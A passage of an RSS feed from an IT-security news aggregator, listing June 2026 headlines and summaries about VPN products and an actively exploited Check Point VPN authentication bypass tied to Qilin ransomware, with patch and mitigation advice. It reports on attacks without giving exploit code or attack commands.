<guid isPermaLink="true">https://tsecurity.de/de/3588237/IT+Server/Windows+Server/Surfshark+Test+2026+%E2%80%93+VPN+f%C3%BCr+Windows+11+im+ausf%C3%BChrlichen+Praxistest+-+WindowsPower.de/</guid>
<pubDate>Wed, 10 Jun 2026 15:32:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[7 in 10 World Cup football fans are ready to put their digital  privacy at risk, warns ExpressVPN]]></title> 
<description><![CDATA[With the 2026 World Cup on the horizon, an ExpressVPN survey finds that the majority of football fans are unwittingly exposing themselves on public Wi-Fi. Here&#039;s how to stay safe. ]]></description>
<link>https://tsecurity.de/de/3588079/IT+Nachrichten/7+in+10+World+Cup+football+fans+are+ready+to+put+their+digital++privacy+at+risk%2C+warns+ExpressVPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588079/IT+Nachrichten/7+in+10+World+Cup+football+fans+are+ready+to+put+their+digital++privacy+at+risk%2C+warns+ExpressVPN/</guid>
<pubDate>Wed, 10 Jun 2026 16:59:57 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Major Russian mobile provider Beeline launches 'whitelist VPN' for Netflix and Spotify]]></title> 
<description><![CDATA[Russian telecom giant Beeline has introduced a built-in &quot;whitelist VPN,&quot; granting users direct access to Western streaming and gaming platforms that suspended their operations in the country. ]]></description>
<link>https://tsecurity.de/de/3587821/IT+Nachrichten/Major+Russian+mobile+provider+Beeline+launches+%27whitelist+VPN%27+for+Netflix+and+Spotify/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587821/IT+Nachrichten/Major+Russian+mobile+provider+Beeline+launches+%27whitelist+VPN%27+for+Netflix+and+Spotify/</guid>
<pubDate>Wed, 10 Jun 2026 15:34:20 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Traveling to North America for the World Cup? Boost your digital privacy and cut down on roaming fees with this VPN and eSIM combo]]></title> 
<description><![CDATA[Smart privacy meets affordable data ]]></description>
<link>https://tsecurity.de/de/3587470/IT+Nachrichten/Traveling+to+North+America+for+the+World+Cup%3F+Boost+your+digital+privacy+and+cut+down+on+roaming+fees+with+this+VPN+and+eSIM+combo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587470/IT+Nachrichten/Traveling+to+North+America+for+the+World+Cup%3F+Boost+your+digital+privacy+and+cut+down+on+roaming+fees+with+this+VPN+and+eSIM+combo/</guid>
<pubDate>Wed, 10 Jun 2026 13:14:47 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN's Saily eSIM offers a US phone number for $1 a month]]></title> 
<description><![CDATA[You now can get a US phone number with NordVPN&#039;s Saily eSIM app. ]]></description>
<link>https://tsecurity.de/de/3587372/IT+Nachrichten/NordVPN%27s+Saily+eSIM+offers+a+US+phone+number+for+%241+a+month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587372/IT+Nachrichten/NordVPN%27s+Saily+eSIM+offers+a+US+phone+number+for+%241+a+month/</guid>
<pubDate>Wed, 10 Jun 2026 13:02:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Fake X-VPN installers found to spread credential-stealing malware — here's how to stay safe]]></title> 
<description><![CDATA[Researchers found a trojanized X-VPN installer used to deploy STX RAT malware. X-VPN itself was not breached, and only attacker-hosted downloads are affected. ]]></description>
<link>https://tsecurity.de/de/3587130/IT+Nachrichten/Fake+X-VPN+installers+found+to+spread+credential-stealing+malware+%E2%80%94+here%27s+how+to+stay+safe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587130/IT+Nachrichten/Fake+X-VPN+installers+found+to+spread+credential-stealing+malware+%E2%80%94+here%27s+how+to+stay+safe/</guid>
<pubDate>Wed, 10 Jun 2026 11:30:44 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Mozilla Firefox: Firefox bietet unbegrenztes VPN im Sommer]]></title> 
<description><![CDATA[Mozilla hebt das Datenlimit f&uuml;r den integrierten VPN-Dienst im Firefox-Browser vor&uuml;bergehend auf und erweitert die Serverauswahl. (VPN, Firefox)  ]]></description>
<link>https://tsecurity.de/de/3586959/IT+Nachrichten/Mozilla+Firefox%3A+Firefox+bietet+unbegrenztes+VPN+im+Sommer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586959/IT+Nachrichten/Mozilla+Firefox%3A+Firefox+bietet+unbegrenztes+VPN+im+Sommer/</guid>
<pubDate>Wed, 10 Jun 2026 10:30:02 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Kostenloses VPN: Firefox hebt bis Ende August alle Datenlimits auf]]></title> 
<description><![CDATA[
			Mozilla wertet das in Firefox integrierte VPN massiv auf und streicht das Datenlimit von 50 Gigabyte. Bis Ende August 2026 surfen Nutzer komplett unbegrenzt &uuml;ber 28 Server-Standorte weltweit. Ein kostenloses Konto reicht als Voraussetzung aus.			(Weiter lesen) ]]></description>
<link>https://tsecurity.de/de/3586950/IT+Sicherheit/Cybersecurity+Nachrichten/Kostenloses+VPN%3A+Firefox+hebt+bis+Ende+August+alle+Datenlimits+auf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586950/IT+Sicherheit/Cybersecurity+Nachrichten/Kostenloses+VPN%3A+Firefox+hebt+bis+Ende+August+alle+Datenlimits+auf/</guid>
<pubDate>Wed, 10 Jun 2026 10:10:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-50751: Check Point zeigt VPN-Bypass gegen IKEv1 mit hoher Kritikalität]]></title> 
<description><![CDATA[LONDON (IT BOLTWISE) &ndash; Check Point warnt vor aktiver Ausnutzung einer kritischen Schwachstelle in Remote-Access-/Mobile-Access-VPNs, die auf IKEv1 setzen. Angreifer k&ouml;nnen demnach die Passwortauthentifizierung umgehen und dennoch eine VPN-Verbindung aufbauen, ohne g&uuml;ltige Zugangsdaten. Betroffen sind u. a. Security Gateways und Firewalls bestimmter R82/R81/R80-Versionen, sofern IKEv1 aktiv ist und keine Maschinezertifikate gefordert werden. Die Attacken sollen [&hellip;]
... den vollst&auml;ndigen Artikel &raquo;CVE-2026-50751: Check Point zeigt VPN-Bypass gegen IKEv1 mit hoher Kritikalit&auml;t&laquo; lesen
Dieser Beitrag CVE-2026-50751: Check Point zeigt VPN-Bypass gegen IKEv1 mit hoher Kritikalit&auml;t erschien als erstes auf IT BOLTWISE x Artificial Intelligence. ]]></description>
<link>https://tsecurity.de/de/3586729/IT+Sicherheit/Cybersecurity+Nachrichten/CVE-2026-50751%3A+Check+Point+zeigt+VPN-Bypass+gegen+IKEv1+mit+hoher+Kritikalit%C3%A4t/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586729/IT+Sicherheit/Cybersecurity+Nachrichten/CVE-2026-50751%3A+Check+Point+zeigt+VPN-Bypass+gegen+IKEv1+mit+hoher+Kritikalit%C3%A4t/</guid>
<pubDate>Wed, 10 Jun 2026 09:01:37 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point Warning: Actively Exploited VPN Zero-Day Linked to Qilin Ransomware]]></title> 
<description><![CDATA[Check Point says VPN zero-day CVE-2026-50751 was exploited by a Qilin-linked actor, prompting emergency hotfixes and a CISA patch deadline.
The post Check Point Warning: Actively Exploited VPN Zero-Day Linked to Qilin Ransomware appeared first on TechRepublic. ]]></description>
<link>https://tsecurity.de/de/3585982/IT+Nachrichten/Check+Point+Warning%3A+Actively+Exploited+VPN+Zero-Day+Linked+to+Qilin+Ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585982/IT+Nachrichten/Check+Point+Warning%3A+Actively+Exploited+VPN+Zero-Day+Linked+to+Qilin+Ransomware/</guid>
<pubDate>Tue, 09 Jun 2026 19:34:29 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point Warning: Actively Exploited VPN Zero-Day Linked to Qilin Ransomware]]></title> 
<description><![CDATA[Check Point says VPN zero-day CVE-2026-50751 was exploited by a Qilin-linked actor, prompting emergency hotfixes and a CISA patch deadline. The post Check Point Warning: Actively Exploited VPN Zero-Day Linked to Qilin Ransomware appeared first on TechRepublic. This article has&hellip;
Read more &rarr;
The post Check Point Warning: Actively Exploited VPN Zero-Day Linked to Qilin Ransomware appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3585957/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+Warning%3A+Actively+Exploited+VPN+Zero-Day+Linked+to+Qilin+Ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585957/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+Warning%3A+Actively+Exploited+VPN+Zero-Day+Linked+to+Qilin+Ransomware/</guid>
<pubDate>Tue, 09 Jun 2026 22:34:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Should I use a VPN to watch the World Cup?]]></title> 
<description><![CDATA[Should you use a VPN to watch the World Cup? A virtual private network will take your viewing experience to the next level this summer. ]]></description>
<link>https://tsecurity.de/de/3585753/IT+Nachrichten/Should+I+use+a+VPN+to+watch+the+World+Cup%3F/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585753/IT+Nachrichten/Should+I+use+a+VPN+to+watch+the+World+Cup%3F/</guid>
<pubDate>Tue, 09 Jun 2026 20:52:32 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warnt: Angreifer umgehen VPN-Authentifizierung | heise online]]></title> 
<description><![CDATA[Nach erfolgreichen Angriffen haben die IT-Sicherheitsforscher zudem Qilin-Ransomware-Bin&auml;rdateien gefunden und Download-Versuche von b&ouml;sartigen ELF-&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3585620/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung+%7C+heise+online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585620/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung+%7C+heise+online/</guid>
<pubDate>Tue, 09 Jun 2026 20:23:57 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CISA gives US federal agencies three days to fix a VPN bug under attack by a ransomware gang]]></title> 
<description><![CDATA[Check Point said hackers broke into dozens of organizations by exploiting a VPN bug in several of its products used across the government. This article has been indexed from Security News | TechCrunch Read the original article: CISA gives US&hellip;
Read more &rarr;
The post CISA gives US federal agencies three days to fix a VPN bug under attack by a ransomware gang appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3585496/IT+Sicherheit/Cybersecurity+Nachrichten/CISA+gives+US+federal+agencies+three+days+to+fix+a+VPN+bug+under+attack+by+a+ransomware+gang/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585496/IT+Sicherheit/Cybersecurity+Nachrichten/CISA+gives+US+federal+agencies+three+days+to+fix+a+VPN+bug+under+attack+by+a+ransomware+gang/</guid>
<pubDate>Tue, 09 Jun 2026 20:04:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Passwort-Bypass bei Check Point: Hacker greifen VPN-Systeme an - it-daily.net]]></title> 
<description><![CDATA[Eine Logikl&uuml;cke in VPNs von Check Point (CVE-2026-50751) erlaubt Passw&ouml;rter zu umgehen. Die Schwachstelle wird aktiv f&uuml;r Ransomware-Angriffe&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3585468/IT+Sicherheit/Cybersecurity+Nachrichten/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an+-+it-daily.net/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585468/IT+Sicherheit/Cybersecurity+Nachrichten/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an+-+it-daily.net/</guid>
<pubDate>Tue, 09 Jun 2026 18:43:37 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CISA gives US federal agencies three days to fix a VPN bug under attack by a ransomware gang]]></title> 
<description><![CDATA[Check Point said hackers broke into dozens of organizations by exploiting a VPN bug in several of its products used across the government. ]]></description>
<link>https://tsecurity.de/de/3585447/IT+Nachrichten/CISA+gives+US+federal+agencies+three+days+to+fix+a+VPN+bug+under+attack+by+a+ransomware+gang/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585447/IT+Nachrichten/CISA+gives+US+federal+agencies+three+days+to+fix+a+VPN+bug+under+attack+by+a+ransomware+gang/</guid>
<pubDate>Tue, 09 Jun 2026 19:40:08 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Mozilla spendiert Firefox-Nutzern im Sommer unlimitiertes VPN]]></title> 
<description><![CDATA[Mozilla dreht beim hauseigenen VPN im Firefox-Browser f&uuml;r die Sommermonate auf. Normalerweise ist der integrierte Dienst auf ein monatliches Datenvolumen von 50 Gigabyte begrenzt. Bis zum 31. August f&auml;llt diese Beschr&auml;nkung komplett weg, sodass der Browser-Traffic ohne Limit verschl&uuml;sselt werden...Zum Beitrag: Mozilla spendiert Firefox-Nutzern im Sommer unlimitiertes VPN

Wo du uns folgen kannst:
Facebook, Reddit, Google News, X, Threads


    Auf dem Laufenden bleiben?
    
    F&uuml;gt uns doch bei Google als bevorzugte Quelle hinzu!
 ]]></description>
<link>https://tsecurity.de/de/3585342/IT+Nachrichten/Mozilla+spendiert+Firefox-Nutzern+im+Sommer+unlimitiertes+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585342/IT+Nachrichten/Mozilla+spendiert+Firefox-Nutzern+im+Sommer+unlimitiertes+VPN/</guid>
<pubDate>Tue, 09 Jun 2026 18:30:28 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Browse more privately all summer with Firefox’s free built-in VPN]]></title> 
<description><![CDATA[For a limited time, where the VPN is available, users can get unlimited VPN bandwidth in Firefox &ndash; up from the 50 gigabytes monthly limit &mdash; plus access to over 25 country locations to browse from. Don&rsquo;t have Firefox yet? Try it now. Firefox&rsquo;s free built-in VPN usually gives eligible users 50 GB of free [&hellip;]
The post Browse more privately all summer with Firefox&rsquo;s free built-in VPN appeared first on The Mozilla Blog. ]]></description>
<link>https://tsecurity.de/de/3585150/IT+Reverse+Engineering/Tools/Browse+more+privately+all+summer+with+Firefox%E2%80%99s+free+built-in+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585150/IT+Reverse+Engineering/Tools/Browse+more+privately+all+summer+with+Firefox%E2%80%99s+free+built-in+VPN/</guid>
<pubDate>Tue, 09 Jun 2026 17:58:16 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Russia’s solution to its VPN crackdown breaking the internet? A state-owned VPN]]></title> 
<description><![CDATA[Russia&#039;s internet regulator, Roskomnadzor, has a unique solution for the problems caused by its own VPN crackdown: creating a state-controlled VPN. The plan is meant to restore access to vital developer tools, but the IT community fears it could become a tool for surveillance. ]]></description>
<link>https://tsecurity.de/de/3585059/IT+Nachrichten/Russia%E2%80%99s+solution+to+its+VPN+crackdown+breaking+the+internet%3F+A+state-owned+VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585059/IT+Nachrichten/Russia%E2%80%99s+solution+to+its+VPN+crackdown+breaking+the+internet%3F+A+state-owned+VPN/</guid>
<pubDate>Tue, 09 Jun 2026 17:53:38 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPN reicht aus, sagt ITSB]]></title> 
<description><![CDATA[KI-Generierte Apps werden im internen Netzwerk bereitgestellt, zum Teil mit erheblichen Sicherheitsm&auml;ngeln. - Passw&ouml;rter ohne Verschl&uuml;sselung in DB - Apps mit Zugriff auf alle Datenbanken (Data Catalog) ganz ohne Passwort &bdquo;damit KI-Agent besser drauf zugreifen kann&ldquo; - Vanilla PHP und Vanilla JS anstatt Frameworks (XSS ohne Probleme m&ouml;glich) - Wenn dann doch Username + Passwort dann kann man das Cookie einfach klauen, oder sich selbst zum Admin machen - Manche der Apps werden von allen MA genutzt, t&auml;glich - Plain HTML als interne Webseiten - Jeder der m&ouml;chte kann mit KI eigene Apps bereitstellen, ohne Review. Also auch jmd der gar kein fullstack kann oder nicht mal coden. - Code Review? brauchen wir nicht. - KI fixt jetzt alles - Teile der Infra sind KRITIS ITSB sagt &bdquo;Spiel dich nicht so auf, VPN reicht und dieser Teil der IT ist auch nicht KRITIS&ldquo;. Was sagt ihr? Reicht VPN?    submitted by    /u/Safe_Article802   [link]   [comments] ]]></description>
<link>https://tsecurity.de/de/3584837/IT+Sicherheit/Cybersecurity+Nachrichten/VPN+reicht+aus%2C+sagt+ITSB/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584837/IT+Sicherheit/Cybersecurity+Nachrichten/VPN+reicht+aus%2C+sagt+ITSB/</guid>
<pubDate>Tue, 09 Jun 2026 15:07:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Apple’s WWDC upgrades might protect your phone — this VPN deal will secure your connection]]></title> 
<description><![CDATA[Apple is always keen to let you know about its privacy and security tools, but it&rsquo;s still worth protecting your device with this VPN deal ]]></description>
<link>https://tsecurity.de/de/3584760/IT+Nachrichten/Apple%E2%80%99s+WWDC+upgrades+might+protect+your+phone+%E2%80%94+this+VPN+deal+will+secure+your+connection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584760/IT+Nachrichten/Apple%E2%80%99s+WWDC+upgrades+might+protect+your+phone+%E2%80%94+this+VPN+deal+will+secure+your+connection/</guid>
<pubDate>Tue, 09 Jun 2026 15:44:41 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point says VPN attacks caused by Qilin ransomware group — who had a month's head start on them]]></title> 
<description><![CDATA[A month-old VPN bug was finally fixed, but not until after Qilin had a field day with it. ]]></description>
<link>https://tsecurity.de/de/3584581/IT+Nachrichten/Check+Point+says+VPN+attacks+caused+by+Qilin+ransomware+group+%E2%80%94+who+had+a+month%27s+head+start+on+them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584581/IT+Nachrichten/Check+Point+says+VPN+attacks+caused+by+Qilin+ransomware+group+%E2%80%94+who+had+a+month%27s+head+start+on+them/</guid>
<pubDate>Tue, 09 Jun 2026 14:58:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warns of ransomware-linked attacks exploiting outdated VPN protocol]]></title> 
<description><![CDATA[
		
					  
						




Check Point has issued emergency hotfixes for a pair of vulnerabilities affecting VPN deployments that still use the deprecated Internet Key Exchange version 1 (IKEv1) protocol, warning that one of the flaws is already being exploited in the wild.



The more serious issue allows attackers to establish VPN sessions without a valid password, potentially giving them a foothold inside corporate networks. According to the company, attackers have been exploiting the vulnerability since at least early May, with activity accelerating in recent weeks.



&ldquo;To date, the observed exploitation has been limited to a few dozen targeted organizations globally,&rdquo; Lotem Finkelstein, vice president of research at Check Point, said in a security blog post. &ldquo;One case involved confirmed post-compromise activity associated with a Qilin ransomware affiliate.&rdquo;



The vulnerabilities affect customers using Remote Access VPN, Mobile Access VPN, and certain Spark Firewall products configured for IKEv1.



While the said protocol has been considered legacy technology for years, it remains enabled in some environments for compatibility reasons. Check Point is urging affected customers to apply the newly released hotfixes immediately and, where possible, migrate from IKEv1 to the newer IKEv2 protocol.



The deprecated protocol became an active risk



The exploited bug, tracked as CVE-2026-50571, affects deployments that continue to accept IKEv1-based remote access connections.



According to Check Point, attackers can exploit a logic oversight in how Remote Access and Mobile Access components validate certificates during the authentication process. Exploitation allows an unauthenticated attacker to establish a VPN connection without supplying a valid user password.



While additional steps may be required to access internal resources or escalate privileges, security researchers note that bypassing the VPN login barrier provides attackers with a significant foothold inside targeted environments.



The vulnerability was put under the &ldquo;Improper Authentication&rdquo; CWE tagged at CWE-287, with a CVSS score of 9.3 assigned to it. Affected Check Point Quantum software platform versions, which run on the Gaia operating system powering all Check Point products, include R80.20.X (EOS), R80.40 (EOS), R81 (EOS), R81.10 (EOS), R81.10.X, R81.20, R82, R82.00.X, R82.10.



The second vulnerability, CVE-2026-50752, emerged during a broader security review conducted as part of Check Point&rsquo;s investigation into the improper authentication flaw. Researchers reportedly used the company&rsquo;s BLAST agentic application security platform to analyze the affected VPN components, leading to the discovery of additional weaknesses in certificate validation logic.



Unlike CVE-2026-50571, the newly identified issue does not allow direct authentication bypass. Instead, it could enable a man-in-the-middle attacker to interfere with site-to-site VPN communications if specific conditions are met.



This flaw received a CVSS score of 7.4, with no exploitation attempts observed in the wild yet.



Mitigations and patches issued



Affected organizations have received a set of resolutions to help with the problem, starting with an attack detection technique.



&ldquo;Search your Check Point SmartConsole logs for possible VPN certificate authentication attempts associated with the observed attacker infrastructure and certificate subject names,&rdquo; Check Point said in an advisory that shared SmartConsole queries for scans around the time range, attacker IP address, and VPN/IKE activities.



Additionally, the company listed three mitigation tips for protection outside and beyond patches. These include removing support for legacy Remote Access client connections, configuring Global properties for Remote Access VPN authentication to IKEv2 only, and setting the machine certificate authentication as mandatory. Lastly, and most effectively, the company issued a string of downloadable hotfixes corresponding to each affected version, which customers can download and apply for complete and immediate protection.
 ]]></description>
<link>https://tsecurity.de/de/3584440/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warns+of+ransomware-linked+attacks+exploiting+outdated+VPN+protocol/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584440/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warns+of+ransomware-linked+attacks+exploiting+outdated+VPN+protocol/</guid>
<pubDate>Tue, 09 Jun 2026 13:59:17 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Windscribe now accepts cash for VPN subscriptions — but admits the process is 'the slowest, riskiest way to pay']]></title> 
<description><![CDATA[Windscribe has officially added a pay-by-cash option for its 1-year Pro subscriptions. But while it champions the anonymity of mailing physical money, the provider openly admits the method is slow, risky, and far from recommended for the average user. ]]></description>
<link>https://tsecurity.de/de/3584420/IT+Nachrichten/Windscribe+now+accepts+cash+for+VPN+subscriptions+%E2%80%94+but+admits+the+process+is+%27the+slowest%2C+riskiest+way+to+pay%27/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584420/IT+Nachrichten/Windscribe+now+accepts+cash+for+VPN+subscriptions+%E2%80%94+but+admits+the+process+is+%27the+slowest%2C+riskiest+way+to+pay%27/</guid>
<pubDate>Tue, 09 Jun 2026 13:46:45 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN lands on Meta Horizon — and VR privacy just got a whole lot easier]]></title> 
<description><![CDATA[NordVPN is the third VPN to enter the metaverse, letting Quest users install a full VPN directly on their headset to encrypt traffic and mask their IP in VR. ]]></description>
<link>https://tsecurity.de/de/3584274/IT+Nachrichten/NordVPN+lands+on+Meta+Horizon+%E2%80%94+and+VR+privacy+just+got+a+whole+lot+easier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584274/IT+Nachrichten/NordVPN+lands+on+Meta+Horizon+%E2%80%94+and+VR+privacy+just+got+a+whole+lot+easier/</guid>
<pubDate>Tue, 09 Jun 2026 13:03:42 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Passwort-Bypass bei Check Point: Hacker greifen VPN-Systeme an - it-daily.net]]></title> 
<description><![CDATA[Eine Logikl&uuml;cke in VPNs von Check Point (CVE-2026-50751) erlaubt Passw&ouml;rter zu umgehen. Die Schwachstelle wird aktiv f&uuml;r Ransomware-Angriffe&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3584253/IT+Sicherheit/Hacker/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an+-+it-daily.net/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584253/IT+Sicherheit/Hacker/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an+-+it-daily.net/</guid>
<pubDate>Tue, 09 Jun 2026 12:48:32 +0200</pubDate>
</item>
<item> 
<title><![CDATA[SME Cybersecurity and ransomware risk: What the Europol VPN takedown means for UK SMEs]]></title> 
<description><![CDATA[Image Credit: Julos via Magnific Latest Posts from SECURUS Communications FIREWALLS SMECYBERIINSIGHTS Do UK SMEs...
The post SME Cybersecurity and ransomware risk: What the Europol VPN takedown means for UK SMEs appeared first on SME Cybersecurity News | SMECYBERInsights.co.uk. ]]></description>
<link>https://tsecurity.de/de/3584252/IT+Sicherheit/Cybersecurity+Nachrichten/SME+Cybersecurity+and+ransomware+risk%3A+What+the+Europol+VPN+takedown+means+for+UK+SMEs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584252/IT+Sicherheit/Cybersecurity+Nachrichten/SME+Cybersecurity+and+ransomware+risk%3A+What+the+Europol+VPN+takedown+means+for+UK+SMEs/</guid>
<pubDate>Tue, 09 Jun 2026 07:00:13 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Passwort-Bypass bei Check Point: Hacker greifen VPN-Systeme an]]></title> 
<description><![CDATA[
    Eine Logikl&uuml;cke in Check-Point-VPNs (CVE-2026-50751) erlaubt Passw&ouml;rter zu umgehen. Die Schwachstelle wird aktiv f&uuml;r Ransomware-Angriffe ausgenutzt.

Tags: #Check Point | #Cyber Crime | #VPN ]]></description>
<link>https://tsecurity.de/de/3584197/IT+Sicherheit/Cybersecurity+Nachrichten/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584197/IT+Sicherheit/Cybersecurity+Nachrichten/Passwort-Bypass+bei+Check+Point%3A+Hacker+greifen+VPN-Systeme+an/</guid>
<pubDate>Tue, 09 Jun 2026 12:42:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[heise+ | WireGuard-Netze leicht im Griff mit Netmaker als VPN-Verwalter]]></title> 
<description><![CDATA[Viele Clients, viel Konfigurationsm&uuml;he? Nicht mit Netmaker. Wir zeigen, wie Sie den VPN-Koordinator f&uuml;r Ihr WireGuard-Netz einspannen. ]]></description>
<link>https://tsecurity.de/de/3584135/IT+Nachrichten/heise%2B+%7C+WireGuard-Netze+leicht+im+Griff+mit+Netmaker+als+VPN-Verwalter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584135/IT+Nachrichten/heise%2B+%7C+WireGuard-Netze+leicht+im+Griff+mit+Netmaker+als+VPN-Verwalter/</guid>
<pubDate>Tue, 09 Jun 2026 12:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks]]></title> 
<description><![CDATA[The authentication bypass vulnerability allows attackers to establish VPN connections without a valid password. The post Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks appeared first on SecurityWeek. This article has been indexed from SecurityWeek Read the original article:&hellip;
Read more &rarr;
The post Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3584092/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Exploited+in+Qilin+Ransomware+Attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584092/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Exploited+in+Qilin+Ransomware+Attacks/</guid>
<pubDate>Tue, 09 Jun 2026 12:04:55 +0200</pubDate>
</item>
<item> 
<title><![CDATA[[NEU] [hoch] Check Point Remote Access VPN und Mobile Access: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen]]></title> 
<description><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Check Point Remote Access VPN und Check Point Mobile Access ausnutzen, um Sicherheitsvorkehrungen zu umgehen. ]]></description>
<link>https://tsecurity.de/de/3584042/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5Bhoch%5D+Check+Point+Remote+Access+VPN+und+Mobile+Access%3A+Mehrere+Schwachstellen+erm%C3%B6glichen+Umgehen+von+Sicherheitsvorkehrungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584042/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5Bhoch%5D+Check+Point+Remote+Access+VPN+und+Mobile+Access%3A+Mehrere+Schwachstellen+erm%C3%B6glichen+Umgehen+von+Sicherheitsvorkehrungen/</guid>
<pubDate>Tue, 09 Jun 2026 11:40:54 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks]]></title> 
<description><![CDATA[The authentication bypass vulnerability allows attackers to establish VPN connections without a valid password.
The post Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks appeared first on SecurityWeek. ]]></description>
<link>https://tsecurity.de/de/3584038/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Exploited+in+Qilin+Ransomware+Attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584038/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Exploited+in+Qilin+Ransomware+Attacks/</guid>
<pubDate>Tue, 09 Jun 2026 11:47:10 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warnt: Angreifer umgehen VPN-Authentifizierung]]></title> 
<description><![CDATA[Angreifer missbrauchen eine kritische Sicherheitsl&uuml;cke in Check-Point-VPN-Software. Sie k&ouml;nnen dadurch die Authentifizierung umgehen. ]]></description>
<link>https://tsecurity.de/de/3583917/IT+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583917/IT+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung/</guid>
<pubDate>Tue, 09 Jun 2026 10:42:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warnt: Angreifer umgehen VPN-Authentifizierung]]></title> 
<description><![CDATA[Angreifer missbrauchen eine kritische Sicherheitsl&uuml;cke in Check-Point-VPN-Software. Sie k&ouml;nnen dadurch die Authentifizierung umgehen. ]]></description>
